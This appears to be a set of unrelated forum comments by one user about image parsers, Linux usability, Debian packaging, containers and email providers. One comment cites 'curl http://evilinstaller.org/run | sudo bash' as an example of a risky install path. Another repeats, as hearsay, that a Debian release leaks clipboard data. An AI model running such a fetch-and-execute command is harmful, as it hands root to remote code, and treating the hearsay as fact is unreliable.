No chance we could just… you know… tell the parents to start parenting for once?

“Those” parents: “The State can not tell me how to raise my child!”

Two weeks later when the State has not told them how to raise their children:

“Waaah waaah! Raising kids too hard! The State should do it for me!”

Sure but that requires the given parser (the web browser, the image lib, etc) to arbitrarily run code in the first place. Which… well, why? It’s an image, not a program. Treat it as an image. Hence “only an idiot” writes an image parser to actually execute an image (same with eg.: only an idiot would write an MP3 parser that arbitrarily executes an MP3).

Even if an SVG had JS in it, as an image-proccessing lib the correct method would be not to try to run the JS in your SVG by yourself but rather just hand it down to whoever is processibg JS at the moment (which would be, well, the browser context and its sandbox).

Youtube video

Lame. Transcript? What’s the useful info?

That makes sense.

You had given me nightmares for a moment. :p

I mean, it’s Debian. To a point I can understand it.

And, from what I can get from the thread, it’s not really a problem that the package exists - rather that the software is packaged and distributed unpatched.

Don’t thank me yet, as I said, this is the first time I’ve ever heard of this kind of bork, so I’m hoping this would fix / sidestep it! :p

It works both ways, which ultimately is the issue.

Windows is basically: download the installer, run it, and boom you’re good to go.

Thank you for installing my virus.

But yeah, I’d basically say that’s an antifeature that ahs been oversold.

And even then, it’s not even the only one. Macniel already pointed out five ways, and I’m rather sure there’s three or four more (I’m p sure Windows has its own equivalent in Powershell to curl http://evilinstaller.org/run | sudo bash, for one).

I think LibreOffice should just be a PWA.

LO already has enough issues wth enabling the Java stuff in the menus, the last thing we need is for it to become a laravel react svelte kitten gemini poob framework-of-the-week POS.

Problems Linux itself has to overcome? Maybe two or three.

• Hopefully I’m mistaken but apparently accessibility has been going down the last few years.
• Settings that make sense to change should be exposed more adequately. No one should ever get a visual toggle to eg.: disable SELinux on their systray, but controls to adjust color profiles and screen “temperature” management should be more reachable and clear.

Problems that are mistakenly attributed to Linux but that are actually for manufacturers, sellers and provisioners to take responsibility for and overcome? A good lot.

• Sellers have to sell machines with Linux preinstalled. Getting a machine Linux-ready from factory is easy, but it’s only the commerces who can actually place them on a, ta know, selling point.
• Sellers or manufacturers should actually advertise when their device works with Linux. If people have to guess whether their next buy even boots / plugs in, that’s a hindrance to commerce.
• Hardware manufacturers are not providing adequate Linux support (FizzyOrange mentions the eternal issue of laptop battery management; Naiboftabr mentions stuff like “audio stops working”).
• Developers have to get back to developing for Linux natively (rather than eg.: “develop for a trimmed down Windows version that runs on Steam”).
• Developers of Linux itself need to provide a better “rescue mode” for when things inevitably go wrong. Something that boots up to a “guaranteed working state” that still has workable UI but with most or all customizations disabled.

A container runs the utility in an isolated environment without having to alter your base system’s packages, dependencies, etc. Assuming the bork that necessitates a reboot is not a kernel or hardware issue, this would mean that if you get hit with that issue again in a container, what dies is the container itself, rather than your system as a whole. So you’re isolating 1.- package management 2.- network config and (potentially) 3.- “blast radius”.

(That said, this is the first time I’ve ever heard that Proton would bork the networking to the point of requiring a whole system reboot.)

Nah, it’s just that despite all the advances by necessity, human communication is complicated.

The fediverse has literally linked the issue, there’s a CVE and a Debian Bugs thread. Like, sure, not all bad news spread fast but to go from there to “insane” shows your primary platform is probably tiktok.

It’s making the rounds on the Fediverse. Example. And the bugtracker shows this thread where the very first responses to the issue raised already promote leaking this data as a “feature”.

Only an idiot parses an image file as executable code.

I heard it was shipping libraries that capture all clipboard data and sent it to foreign servers unencrypted, and that this was being defended in the buglist as a feature, so I might actually skip this one at least until the first or second batch of security updates rolls on.

For servers, it makes not much difference for me; where possible I either stick to Stable + Backports (which requires Backports in the first place) or jump right to Unstable.

Disroot is in my 👀 now because you guys reminded me it was already, some time ago. Let’s see how that one goes!

I’ll be considering it, but if I have to deal with paid services in this good year of Arceus of 2025 I’d prefer them to at least deal with my national currency directly, or fall within my country’s jurisdiction.

I’ve made an exception for SDF simply because 1.- they’re awesome and 2.- the payment is one-time-only.

Looks paid, I prefer to discard any possible solutions on my country’s currency before I even take a look at having to deal with international KYC shit.

Yes.